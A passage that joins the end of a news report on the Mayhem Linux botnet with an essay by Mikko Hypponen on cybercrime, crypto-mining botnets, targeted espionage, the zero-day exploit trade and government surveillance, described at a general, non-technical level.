According to the researchers, Mayhem appears to be the continuation of the Fort Disco brute-force password cracking attack campaign that began in May 2013.

At the time, Fort Disco had created a botnet with six command and control sites and over 25,000 infected Windows computers, according to Arbor Networks security analysts.

Mayhem worldwide distribution. Source: Virus Bulletin

A total of 1400 infections have been recorded around the world for Mayhem so far, with most of these in the United States, Russia, Germany and Canada, the researchers said.

Sidorov told iTnews that recently discovered data from the largest Mayhem command and control server showed that there were 14 infected machines in Australia, and two in New Zealand.

Commenting on the research, Virus Bulletin editor Martijn Grooten said the threat Mayhem poses was relatively small compared to existing botnets.

But he warned that Mayhem should be taken seriously nevertheless, as it had the ability to compromise powerful Linux servers and was actively looking for other sites and machines to infect.

“It is another reminder to those running web servers that these have become prime targets for malware authors,” Grooten said.

The researchers warned that despite increasingly being targeted by malware authors, many webmasters who run UNIX-like operating systems don’t have the opportunity to update their infrastructure automatically, and that serious maintenance is expensive and therefore often not undertaken.

This, combined with lack of anti-virus technologies, active defences and process memory checking modules in the UNIX world, meant “it is easy for hackers to find vulnerable web servers and to use such servers in their botnets,” the researchers stated.

Cyber Attacks By Mikko Hypponen


The real world isn’t like the online world.

In the real world, you only have to worry about the criminals who live in your city. But in the online world, you have to worry about criminals who could be on the other side of the planet. Online crime is always international because the Internet has no borders.

Today computer viruses and other malicious software are no longer written by hobbyist hackers seeking fame and glory among their peers. Most of them are written by professional criminals who are making millions with their attacks. These criminals want access to your computer, your PayPal passwords, and your credit card numbers.

I spend a big part of my life on the road, and I’ve visited many of the locations that are considered to be hotspots of online criminal activity. I’ve been to Moscow, São Paulo, Tartu, Vilnius, St. Petersburg, Beijing, and Bucharest.

I’ve met the underground and I’ve met the cops. And I’ve learned that things are never as simple as they seem from the surface. One would think that the epicenter for banking attacks, for example, would prioritize fighting them, right?

Right, but dig deeper and complications emerge. A good example is a discussion I had with a cybercrime investigator in Brazil. We spoke about the problems in Brazil and how São Paulo has become one of the largest sources of banking trojans in the world.

The investigator looked at me and said, “Yes. I understand that. But what you need to understand is that São Paulo is also one of the murder capitals of the world. People are regularly gunned down on the streets. So where exactly should we put our resources? To fight cybercrime? Or to fight crimes where people die?”

It’s all a matter of balancing. When you balance the damage done by cybercrime and compare it to a loss of life, it’s pretty obvious what’s more important.

National police forces and legal systems are finding it extremely difficult to keep up with the rapid growth of online crime. They have limited resources and expertise to investigate online criminal activity. The victims, police, prosecutors, and judges rarely uncover the full scope of the crimes that often take place across international boundaries. Action against the criminals is too slow, the arrests are few and far between, and too often the penalties are very light, especially compared with those attached to real-world crimes.

Because of the low priority given to prosecuting cybercriminals and the delays in applying effective penalties, we are sending the wrong message to the criminals, and that’s why online crime is growing so fast. Right now would-be online criminals can see that the likelihood of their getting caught and punished is vanishingly small, yet the profits are great.

The reality for those in positions like the São Paulo investigator is that they must balance both fiscal constraints and resource limitations. They simply cannot, organizationally, respond to every type of threat. If we are to keep up with the cybercriminals, the key is cooperation. The good news is that the computer security industry is quite unique in the way direct competitors help each other.

The Turning Point

If you were running Windows on your computer 10 years ago, you were running Windows XP. In fact, you were most likely running Windows XP SP1 (Service Pack 1). This is important, as Windows XP SP1 did not have a firewall enabled by default and did not feature automatic updates. So, if you were running Windows, you weren’t running a firewall and you had to patch your system manually—by downloading the patches with Internet Explorer 6, which itself was ridden with security vulnerabilities.

No wonder, then, that worms and viruses were rampant in 2003. In fact, we saw some of the worst outbreaks in history in 2003: Slammer, Sasser, Blaster, Mydoom, Sobig, and so on. They went on to do some spectacular damage. Slammer infected a nuclear power plant in Ohio and shut down Bank of America’s ATM systems. Blaster stopped trains in their tracks outside Washington, D.C., and shut down Air Canada check-in systems at Canadian airports. Sasser thoroughly infected several hospitals in Europe.

The problems with Windows security were so bad that Microsoft had to do something. And they did. In hindsight, they did a spectacular turnaround in their security processes. They started Trustworthy Computing. They stopped all new development for a while to go back and find and fix old vulnerabilities. Today, the difference in the default security level of 64-bit Windows 8 is so much ahead of Windows XP you can’t even compare them.

We’ve seen other companies do similar turnarounds. When the Microsoft ship started to become tighter and harder to attack, the attackers started looking for easier targets. One favorite was Adobe Reader and Adobe Flash. For several years, one vulnerability after another was found in Adobe products, and most users were running badly outdated products as updating wasn’t straightforward. Eventually Adobe got their act together. Today, the security level of, say, Adobe Reader, is so much ahead of older readers you can’t even compare them.

The battle at hand right now is with Java and Oracle. It seems that Oracle hasn’t gotten their act together yet. And maybe they don’t even have to: users are voting with their feet and Java is already disappearing from the web.

The overall security level of end-user systems is now better than ever before. The last decade has brought us great improvements. Unfortunately, the last decade has also completely changed who we’re fighting.

In 2003, all the malware was still being written by hobbyists, for fun. The hobbyists have been replaced by new attackers: not just organized criminals, but also hacktivists and governments. Criminals and especially governments can afford to invest in their attacks. As an end result, we’re still not safe with our computers, even with all the great improvements.

But at least we don’t see flights grounded and trains stopped by malware every other week, like we did in 2003.

Crypto Currencies

In 2008, a mathematician called Satoshi Nakamoto submitted a technical paper for a cryptography conference. The paper described a peer-to-peer network where participating systems would do complicated mathematical calculations on something called a blockchain. This system was designed to create a completely new currency: a crypto currency. In short, a currency that is based on math. The paper was titled “Bitcoin: A Peer-to-Peer Electronic Cash System.”

Since Bitcoin is not linked to any existing currency, its value is purely based on the value people believe it’s worth. And since it can be used to do instant transactions globally, it does have value. Sending Bitcoins around is very much like sending e-mail. If I have your address, I can send you money. I can send it to you instantly, anywhere, bypassing exchanges, banks, and the tax man. In fact, crypto currencies make banks unnecessary for moving money around—which is why banks hate the whole idea.

The beauty of the algorithm behind Bitcoin is solving two main problems of crypto currencies by joining them: how do you confirm transactions and how do you inject new units of currency into the system without causing inflation. Since there is no central bank in the system, the transactions need to be confirmed somehow—otherwise one could fabricate fake money. In Bitcoin, the confirmations are done by other members of the peer-to-peer network. At least six members of the peer-to-peer network have to confirm the transactions before they go through. But why would anybody confirm transactions for others? Because they get rewarded for it: the algorithm issues new Bitcoins as reward to users who have been participating in confirmations. This is called mining.

When Bitcoin was young, mining was easy and you could easily make dozens of Bitcoins on a home computer. However, as Bitcoin’s value grew, mining became harder since more people were interested in doing it. Even though the dollar-to-BTC exchange rate has fluctuated, the fact remains that in the beginning of 2013, the exchange rate for a Bitcoin was $8 and by the fall it was $130. So Bitcoins now have very real real-world value.

When Bitcoins became valuable, people were more and more interested in Satoshi Nakamoto. He gave a few e-mail interviews, but eventually stopped correspondence altogether. Then he disappeared. When people went looking for him, they realized Satoshi Nakamoto didn’t exist. Even today, nobody knows who invented Bitcoin. Nevertheless, Bitcoin fans have been spotted wearing T-shirts saying “Satoshi Nakamoto Died for Our Sins.”

Today, there are massively large networks of computers mining Bitcoins and other competing crypto currencies (such as Litecoin). The basic idea behind mining is easy enough: if you have powerful computers, you can make money. Unfortunately, those computers don’t have to be your own computers. Some of the largest botnets run by online criminals today are monetized by mining. So, you’d have an infected home computer of a grandmother in, say, Barcelona, running Windows XP at 100 percent utilization around the clock as it is mining coins worth tens of thousands of dollars a day for a Russian cybercrime gang. It’s easy to see that such mining botnets will become very popular for online criminals in the future.

Even more importantly, such an attack does not require a user for the computers in order to make money. Most traditional botnet monetization mechanisms required a user’s presence. For example, credit card keyloggers needed a user at the keyboard to type in his payment details or ransom trojans needed a user to pay a ransom in order to regain access to his computer or his data. Mining botnets just need processing power and a network connection.

Some of the upcoming crypto currencies do not need high-end GPUs to do the mining: a regular CPU will do. When you combine that with the fact that home automation and embedded devices are becoming more and more common, we can make an interesting forecast: there will be botnets that will be making money by mining on botnets created out of embedded devices. Think botnets of infected printers or set-top boxes or microwave ovens. Or toasters.

Whether it makes sense or not, toasters with embedded computers and Internet connectivity will be reality one day. Before crypto currencies existed, it would have been hard to come up with a sensible reason for why anybody would want to write malware to infect toasters. However, mining botnets of thousands of infected toasters could actually make enough money to justify such an operation. Sooner or later, this will happen.


Spying is about collecting information. When information was still written on pieces of paper, a spy had to physically go and steal it. These days information is data on computers and networks, so modern spying is often carried out with the help of malware. The cyber spies use trojans and backdoors to infect their targets’ computers, giving them access to the data even from the other side of the world.

Who spends money on spying? Companies and countries do. When companies do it, it’s called industrial espionage. When countries do it, it’s just espionage.

In the most typical case, the attack is made through e-mail to a few carefully selected people or even a single person in the organization. The target receives what seems like an ordinary e-mail with an attached document, often from a familiar person. In reality, the whole message is a forgery. The e-mail sender’s details are forged and the seemingly harmless attached document contains the attack code. If the recipient does not realize the e-mail is a forgery, the whole case will probably go unnoticed, forever.

Program files like Windows EXE files do not get through firewalls and filters, so the attackers commonly use PDF, DOC, XLS, and PPT document files as the attachment. These are also more likely to be viewed as safe documents by the recipient. In their standard form these file types do not contain executable code, so the attackers use vulnerabilities in applications like Adobe Reader and Microsoft Word to infect the computer when the booby-trapped documents are opened.

The structure of these attack files has been deliberately broken so that it crashes the office application in use when opened, while simultaneously executing the binary code inside the document. This code usually creates two new files on the hard disk and executes them. The first is a clean document that opens up on the user’s monitor and distracts the user from the crash.

The second new file is a backdoor program that starts immediately and hides itself in the system, often using rootkit techniques. It establishes a connection from the infected computer to a specific network address, anywhere in the world. With the help of the backdoor the attacker gains access to all the information on the target computer, as well as the information in the local network that the targeted person has access to.

The attacks often use backdoor programs like Gh0st RAT or Poison Ivy to remotely monitor their targets. With such tools, they can do anything they want on the target machine. This includes logging the keyboard to collect passwords and a remote file manager to search documents with interesting content. Sometimes the attackers can eavesdrop on their target by remotely controlling the microphone of the infected computer.

I’ve been tracking targeted spying attacks since they were first observed in 2005. Targets have included large companies, governments, ministries, embassies, and nonprofit organizations like those who campaign for the freedom of Tibet, support minorities in China, or represent the Falun Gong religion. It would be easy to point the finger at the government of China. But we don’t have the smoking gun. Nobody can conclusively prove the origin of these attacks. In fact, we know with a high degree of certainty that several governments are engaging in similar attacks.

It’s also clear that what we’ve seen so far is just the beginning. Online espionage and spying can only become a more important tool for intelligence purposes in the future. Protecting against such attacks can prove to be very difficult.

The most effective method to protect data against cyber spying is to process confidential information on dedicated computers that are not connected to the Internet. Critical infrastructure should be isolated from public networks.

And isolation does not mean a firewall: it means being disconnected. And being disconnected is painful, complicated, and expensive. But it’s also safer.


A very large share of criminal and governmental cyber attacks use exploits to infect the target computer.

Without a vulnerability, there is no exploit. And ultimately, vulnerabilities are just bugs: programming errors. And we have bugs because programs are written by human beings and human beings make errors. Software bugs have been a problem as long as we’ve had programmable computers, and they aren’t going to disappear.

Before the Internet became widespread, bugs weren’t very critical. You would be working on a word processor, open a corrupted document file, and your word processor would crash. While annoying, such a crash wasn’t too big of a deal. You might lose any unsaved work in open documents, but that’s it. But as soon as the Internet entered the picture, things changed. Suddenly bugs that used to be just a nuisance could be used to take over your computer.

We have different classes of vulnerabilities and their severity ranges from a nuisance to critical.

First, we have local and remote vulnerabilities. Local vulnerabilities can only be exploited by a local user who already has access to the system. But remote vulnerabilities are much more severe as they can be exploited from anywhere over a network connection.

Vulnerability types can then be divided by their actions on the target system: denial-of-service, privilege escalation, or code execution. Denial-of-service vulnerabilities allow the attacker to slow down or shut down the system. Privilege escalations can be used to gain additional rights on a system, and code execution allows running commands.

The most serious vulnerabilities are remote code execution vulnerabilities. And these are what the attackers need.

But even the most valuable vulnerabilities are worthless if the vulnerability gets patched. So the most valuable exploits target vulnerabilities that are not known to the vendor behind the exploited product. This means that the vendor cannot fix the bug and issue a security patch to close the hole. If a security patch is available and the vulnerability starts to get exploited by the attackers five days after the patch came out, users had five days to react. If there is no patch available, users had no time at all to secure themselves: literally zero days. This is where the term zero-day vulnerability comes from: users are vulnerable, even if they had applied all possible patches.

The knowledge of the vulnerabilities needed to create these exploits is gathered from several sources. Experienced professionals search for vulnerabilities systematically by using techniques like fuzzing or by reviewing the source code of open-source applications, looking for bugs. Specialist tools have been created to locate vulnerable code in compiled binaries. Less experienced attackers can find known vulnerabilities by reading security-themed mailing lists or by reverse engineering security patches as they are made available by the affected vendors. Exploits are valuable even if a patch is available, as there are targets that don’t patch as quickly as they should.

Originally, only hobbyist malware writers were using exploits to do offensive attacks. Worms like Code Red, Sasser, and Blaster would spread around the world in minutes as they could remotely infect their target with exploits.

Things changed as organized criminal gangs started making serious money with keyloggers, banking trojans, and ransom trojans. As money entered the picture, the need for fresh exploits created an underground marketplace. Things changed even more as governments entered the picture. As the infamous Stuxnet malware was discovered in July 2010, security companies were amazed to notice this unique piece of malware was using a total of four different zero-day exploits—which remains a record in its own field. Stuxnet was eventually linked to an operation launched by the governments of the United States and Israel to target various objects in the Middle East and to especially slow down the nuclear program of the Islamic Republic of Iran.

Other governments learned of Stuxnet and saw the three main takeaways of it: attacks like these are effective, they are cheap, and they are deniable. All of these qualities are highly sought after in espionage and military attacks. In effect, this started a cyber arms race that today is a reality in most of the technically advanced nations. These nations weren’t just interested in running cyber defense programs to protect themselves against cyber attacks. They wanted to gain access to offensive capability and to be capable of launching offensive attacks themselves.

To have a credible offensive cyber program, a country will need a steady supply of new exploits. Exploits don’t last forever. They get found out and patched. New versions of the vulnerable software might require new exploits, and these exploits have to be weaponized and reliable.

As finding the vulnerabilities and creating the weaponized exploits is hard, most governments would need to outsource this job to experts. Where can they find such expertise? Security companies and antivirus experts are not providing attack code: they specialize in defense, not attacks. Intelligence agencies and militaries have always turned to defense contractors when they need technology they can’t produce by themselves. This applies to exploits as well.

Simply by browsing the websites of the largest defense contractors in the world, you can easily find out that most of them advertise offensive capability to their customers. Northrop Grumman even runs radio ads claiming that they “provide governmental customers with both offensive and defensive solutions.”

However, even the defense contractors might have a hard time building the specialized expertise to locate unknown vulnerabilities and to create attacks against them. Many of them seem to end up buying their exploits from one of the several boutique companies specializing in finding zero-day vulnerabilities. Such companies have popped up in various countries. These companies go out of their way to find bugs that can be exploited and turned into security holes. Once found, the exploits are weaponized. In this way, they can be abused effectively and reliably. These attackers also try to make sure that the company behind the targeted product will never learn about the vulnerability—because if they did, they would fix the bug. Consequently, the customers and the public at large would not be vulnerable any more. This would make the exploit code worthless to the vendor.

Companies specializing in selling exploits operate around the world. Some of the known companies reside in the United States, the United Kingdom, Germany, Italy, and France. Others operate from Asia. Many of them like to portray themselves as being part of the computer security industry. However, we must not mistake them for security companies, as these companies do not want to improve computer security. Quite the opposite, these companies go to great lengths to make sure the vulnerabilities they find do not get closed, making all of us more vulnerable.

In some cases, exploits can be used for good. For example, sanctioned penetration tests done with tools like Metasploit can improve the security of an organization. But that's not what we're discussing here. We're talking about finding and weaponizing zero-day vulnerabilities solely for use in secret offensive attacks.

The total size of the exploit export industry is hard to estimate. However, looking at public recruitment ads of the known actors as well as various defense contractors, it’s easy to see there is much more recruitment happening right now for offensive positions than for defensive roles. As an example, some U.S.-based defense contractors have more than a hundred open positions for people with Top Secret/SCI clearance to create exploits. Some of these positions specifically mention the need to create offensive exploits targeting iPhones, iPads, and Android devices.

If we look for offensive cyber attacks that have been linked back to a known government, the best known examples link back to the governments of the United States and Israel. When the New York Times ran the story linking the U.S. Government and the Obama administration to Stuxnet, the White House started an investigation into who had leaked the information. Note that they never denied the story. They just wanted to know who leaked it.

As the U.S. is engaging in offensive cyber attacks on other countries, certainly other countries feel that they are free to do the same. This cyber arms race has created an increasing demand for exploits.

Government Surveillance

When the Internet became commonplace in the mid-1990s, the decision makers ignored it. They didn't see it as important or in any way relevant to them. As a direct result, global freedom flourished in the unrestricted online world. Suddenly people all over the world had within their reach something truly global. And suddenly, people weren't just consuming content; they were creating content for others to see.

But eventually politicians and leaders realized just how important the Internet is. And they realized how useful the Internet was for other purposes, especially for conducting surveillance on citizens.

The two arguably most important inventions of our generation, the Internet and mobile phones, changed the world. However, they both turned out to be perfect tools for the surveillance state. And in a surveillance state, everybody is assumed guilty.

Internet surveillance really became front-page material when Edward Snowden started leaking information on PRISM, XKeyscore, and other NSA programs in the summer of 2013.

But don’t get me wrong. I do understand the need for doing both monitoring and surveillance. If somebody is suspected of running a drug ring, or planning a school shooting, or participating in a terror organization, he should be monitored, with a relevant court order.

However, that's not what PRISM is about. PRISM is not about monitoring suspicious people. PRISM is about monitoring everyone. It's about monitoring people who are known to be innocent. And it's about building dossiers on everyone, eventually going back decades. Such dossiers, based on our Internet activity, build a thorough picture of us. And if the powers-that-be ever need a way to twist your arm, they will certainly find something suspicious or embarrassing on anyone, provided they have enough of that person's Internet history recorded.

United States intelligence agencies have a full legal right to monitor foreigners. That doesn't sound too bad, until you realize that most of us are foreigners to the Americans. In fact, 96 percent of the people on the planet turn out to be such foreigners. And when these people use U.S.-based services, they are legally under surveillance.

When the PRISM leaks started, U.S. intelligence tried to calm the rest of the world by explaining that there was no need to worry and that these programs were just about fighting terrorists. But then further leaks proved the U.S. was using its tools to monitor the European Commission and the United Nations as well. It's difficult to argue that they were trying to find terrorists at the European Union headquarters.

Another argument we've heard from the U.S. intelligence apparatus is that everyone else is doing Internet surveillance too. And indeed, most countries do have intelligence agencies, and most of them do monitor what other countries are doing. However, the U.S. has an unfair advantage. Almost all of the common Internet services, search engines, webmails, web browsers, and mobile operating systems come from the U.S. To put it another way: How many Spanish politicians and decision makers use American services? Answer: all of them. And how many American politicians and decision makers use Spanish services? Answer: none of them.

All this should make it obvious that we foreigners should not use U.S.-based services. They’ve proven to us that they are not trustworthy. Why would we voluntarily hand our data to a foreign intelligence agency?

But in practice, it’s very hard to avoid using services like Google, Facebook, LinkedIn, Dropbox, Amazon, Skydrive, iCloud, Android, Windows, iOS, and so on. This is a clear example of the failure of Europe, Asia, and Africa to compete with the U.S. on Internet services. And when the rest of the world does produce a global hit—like Skype or Nokia—it typically ends up acquired by an American company, bringing it under U.S. control.

But if you’re not doing anything wrong, why worry about this? Or, if you are worrying about this, what do you have to hide? My answer to this question is that I have nothing to hide… but I have nothing in particular that I’d want to share with an intelligence agency either. In particular, I have nothing to share with a foreign intelligence agency. If we really need a big brother, I’d much rather have a domestic big brother than a foreign big brother.

People have asked me if they really should worry about PRISM. I’ve told them that they should not be worried—they should be outraged instead. We should not just accept such blanket and wholesale surveillance from one country on the rest of the world.

Advancements in computing power and data storage have made wholesale surveillance possible. But they've also made leaking possible. That's how Edward Snowden could walk away with three laptops that contained so much information that, printed out, it would fill a long row of trucks with paper.

Leaking has become so easy that organizations will have to keep worrying about getting caught in any wrongdoing. We might hope that this forces organizations to avoid unethical practices.

While governments are watching over us, they know we are watching over them.

We've seen massive shifts in cyber attacks over the last two decades: from simple viruses written by teenagers to multimillion-dollar cyber attacks launched by nation-states.

All this is happening right now, during our generation. We were the first generation that got online. We should do what we can to secure the net and keep it free so that it will be there for future generations to enjoy.